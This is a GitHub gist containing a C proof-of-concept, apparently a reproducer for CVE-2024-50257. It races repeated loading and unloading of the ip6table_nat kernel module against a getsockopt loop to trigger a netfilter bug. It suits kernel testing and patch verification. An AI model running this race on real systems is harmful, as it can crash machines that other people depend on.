Created
November 25, 2024 14:48
-
-
Save masami256/82577bbaecbb62d9baa8889315f6a659 to your computer and use it in GitHub Desktop.
cve-2024-50257.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc cve-2024-50257.c -lpthread | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <unistd.h> | |
| #include <pthread.h> | |
| #include <fcntl.h> | |
| #include <linux/module.h> | |
| #include <sys/syscall.h> | |
| #include <time.h> | |
| // load module https://www.man7.org/linux/man-pages/man2/init_module.2.html | |
| // unload module https://www.man7.org/linux/man-pages/man2/delete_module.2.html | |
| // ip6table_nat | |
| //#define IP6TABLE_NAT "/lib/modules/5.15.0-126-generic/kernel/net/ipv6/netfilter/ip6table_nat.ko" | |
| #define IP6TABLE_NAT "/lib/modules/5.15.0-test/kernel/net/ipv6/netfilter/ip6table_nat.ko" | |
| static inline int get_usec(void) | |
| { | |
| return 100000 + rand() % 900000; | |
| } | |
| static void *module_ops(void *arg) | |
| { | |
| while (1) { | |
| int fd = open(IP6TABLE_NAT, O_RDONLY); | |
| if (fd < 0) { | |
| perror("open"); | |
| exit(1); | |
| } | |
| // module parameter should be empty string. | |
| // NULL returns Bad address error. | |
| if (syscall(SYS_finit_module, fd, "", 0)) { | |
| perror("init_module"); | |
| exit(1); | |
| } | |
| close(fd); | |
| //printf("[+] module is loaded\n"); | |
| usleep(get_usec()); | |
| if (syscall(SYS_delete_module, "ip6table_nat", 0)) { | |
| perror("delete_module"); | |
| exit(1); | |
| } | |
| //printf("[+] module is unloaded\n"); | |
| } | |
| return NULL; | |
| } | |
| static void *do_get_info(void *arg) | |
| { | |
| int cnt = 0; | |
| while (1) { | |
| //usleep(get_usec()); | |
| // Create an IPv6 socket | |
| int sockfd = socket(AF_INET6, SOCK_STREAM, 0); | |
| if (sockfd < 0) { | |
| perror("Socket creation failed"); | |
| exit(1); | |
| } | |
| // Variable to store the option value | |
| int optval; | |
| socklen_t optlen = sizeof(optval); | |
| // Get the IPV6_V6ONLY option using getsockopt() | |
| if (getsockopt(sockfd, IPPROTO_IPV6, IPV6_V6ONLY, &optval, &optlen) < 0) { | |
| perror("getsockopt failed"); | |
| close(sockfd); | |
| exit(1); | |
| } | |
| cnt++; | |
| if (cnt == 10000) { | |
| // Print the option value | |
| //printf("IPV6_V6ONLY: %s\n", optval ? "enabled" : "disabled"); | |
| cnt = 0; | |
| } | |
| // Close the socket | |
| close(sockfd); | |
| } | |
| return NULL; | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| pthread_t get_info_th; | |
| pthread_t module_ops_th; | |
| int ret; | |
| ret = pthread_create(&get_info_th, NULL, &do_get_info, NULL); | |
| if (ret) { | |
| perror("pthread_create1"); | |
| exit(1); | |
| } | |
| ret = pthread_create(&module_ops_th, NULL, &module_ops, NULL); | |
| if (ret) { | |
| perror("pthread_create2"); | |
| exit(1); | |
| } | |
| pthread_join(get_info_th, NULL); | |
| pthread_join(module_ops_th, NULL); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment